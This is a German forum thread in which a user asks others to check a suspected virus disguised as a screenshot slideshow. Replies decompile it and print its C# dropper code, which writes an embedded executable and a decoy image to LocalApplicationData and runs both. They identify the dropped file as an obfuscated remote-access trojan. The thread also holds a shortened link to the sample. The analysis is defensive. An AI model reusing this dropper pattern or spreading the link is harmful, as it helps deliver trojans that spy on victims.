1. #1
    Avatar von x BoooM x
    Registriert seit
    30.11.2011
    Beiträge
    1.261
    Thanked 588 Times in 260 Posts

    Standard Kann jemand das Programm checken?

    Hey.

    So ein Typ wollte mir einen Screen zeigen und hat den angeblich als Slideshow hochgeladen, wenn ich den Ordnet runterlade und entpacke wird ein Virus angezeigt, war mir eigtl. schon klar weil wieso sollte man einen Screenshot als Slideshow hochladen?

    Habe das Programm natürlich nicht geöffnet.

    Kann das jemand irgendwie prüfen was es anrichtet bzw. welchen Code es enthält?

    Hier der Download für den Ordner:
    http://goo.gl/hjRL2
    Geändert von x BoooM x (04.12.2012 um 19:07 Uhr)

  2. #2
    Avatar von iToxic
    Registriert seit
    18.11.2011
    Beiträge
    918
    Thanked 1.773 Times in 913 Posts

    Standard AW: Kann jemand das Programm checken?

    Lass die Finger davon:
    ResourceManager manager = new ResourceManager("files", Assembly.GetExecutingAssembly()); File.WriteAllBytes(Environment.GetFolderPath(Envir onment.SpecialFolder.LocalApplicationData) + "sEoycl_rRQ.exe", (byte[]) manager.GetObject("QOaWGvoyKO")); Process.Start(Environment.GetFolderPath(Environmen t.SpecialFolder.LocalApplicationData) + "sEoycl_rRQ.exe"); File.WriteAllBytes(Environment.GetFolderPath(Envir onment.SpecialFolder.LocalApplicationData) + "RqDNeJTNBv.jpg", (byte[]) manager.GetObject("ZuhHWnLJVd")); Process.Start(Environment.GetFolderPath(Environmen t.SpecialFolder.LocalApplicationData) + "RqDNeJTNBv.jpg");
    Wenn er dir Bilder schicken will, dann soll er dir sie so schicken


  3. #3

    Registriert seit
    17.09.2012
    Beiträge
    1.865
    Thanked 384 Times in 258 Posts

    Standard AW: Kann jemand das Programm checken?

    Slideshow hochladen als Screenshot?

    Andersrum screenshot als slidesho

  4. #4
    Avatar von x BoooM x
    Registriert seit
    30.11.2011
    Beiträge
    1.261
    Thanked 588 Times in 260 Posts

    Standard AW: Kann jemand das Programm checken?

    Zitat Zitat von iToxic Beitrag anzeigen
    Lass die Finger davon:


    Wenn er dir Bilder schicken will, dann soll er dir sie so schicken
    Was bedeutet der Code? Bzw. was richtet er an?

  5. #5
    Avatar von Sploxfreak
    Registriert seit
    25.01.2012
    Beiträge
    511
    Thanked 128 Times in 117 Posts

    Standard AW: Kann jemand das Programm checken?

    Programm in .Net Reflector
    Spoiler:


    Wenn man das Programm ausführt wird einmal der Trojaner aus den Resourcen geladen und ausgeführt und einmal das IMG aus den Resourcen geladen und ausgeführt.
    Geändert von Sploxfreak (04.12.2012 um 18:49 Uhr)
    Vom Noob zum Übergott

  6. #6
    Avatar von iToxic
    Registriert seit
    18.11.2011
    Beiträge
    918
    Thanked 1.773 Times in 913 Posts

    Standard AW: Kann jemand das Programm checken?

    Zitat Zitat von x BoooM x Beitrag anzeigen
    Was bedeutet der Code? Bzw. was richtet er an?
    Er dropt ne andere Datei, welche eine Server.exe ist (RAT)

    Es werden WebCam und co kontrolliert...

    Die gedroppte Datei ist "geschützt" mit:

    Babel .NET 4.0.0.0
    DeepSea 4.0


  7. The Following User Says Thank You to iToxic For This Useful Post:

    x BoooM x (04.12.2012)

Ähnliche Themen

  1. Antworten: 2
    Letzter Beitrag: 28.01.2014, 12:02
  2. Kann jemand Programm auf Viren prüfen?
    Von x BoooM x im Forum Software
    Antworten: 2
    Letzter Beitrag: 31.10.2012, 20:39
  3. VB.Net Suche jemand der mir ein Programm macht
    Von x BoooM x im Forum .Net
    Antworten: 2
    Letzter Beitrag: 23.06.2012, 14:18
Diese Seite nutzt Cookies, um das Nutzererlebnis zu verbessern. Klicken Sie hier, um das Cookie-Tracking zu deaktivieren.